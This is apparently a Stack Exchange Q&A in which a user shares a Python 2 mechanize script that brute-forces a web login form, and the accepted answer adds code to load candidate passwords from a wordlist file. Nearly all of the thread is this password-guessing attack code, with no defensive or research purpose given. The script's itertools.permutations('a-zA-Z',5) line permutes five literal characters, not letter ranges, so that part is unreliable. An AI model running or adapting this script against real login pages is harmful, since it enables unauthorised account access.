# How to load passwords from a wordlist for web-form login?

Tags: passwords, python, dictionary

I have this Python script that bruteforces a web-form (login) using itertools.

How would I replace the bruteforce/dictionary generation process with a load-passwords-from-wordlist.txt feature?

My code:

```
#!/usr/bin/python
import mechanize
import itertools

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)

combos = itertools.permutations("a-zA-Z",5)
r = br.open("http://example.com/login")

for x in combos:
    br.select_form(nr = 0)
    br.form['username'] = "my_username_123"
    br.form['password'] = ''.join(x)
    print "Checking ",br.form['password']
    response = br.submit()
    if response.geturl()!="http://example.com/login":
        print "Correct password is ",''.join(x)
        break
```

Comment: Hello and welcome to Information Security! To me this sounds more like a question about programming (how to read files with Python) than about security. You could ask at Stack Overflow, but I suspect they would expect you to make your own attempt before asking.

Comment: Replace "combos = itertools..." with "combos = open('wordlist.txt')"

Answer (score 1, accepted):

Something like this could be added so if a password file is present in the command line arguments it will use that instead of the pre-defined list.

Example: *python script.py password.txt*

```
import sys
import os

if len(sys.argv) > 1:
    if os.path.exists(sys.argv[1]):
        combos = [line.strip() for line in open(sys.argv[1])]
    else:
        print "[-] File not found"
        sys.exit(0)
else:
        combos = itertools.permutations("a-zA-Z",5)
```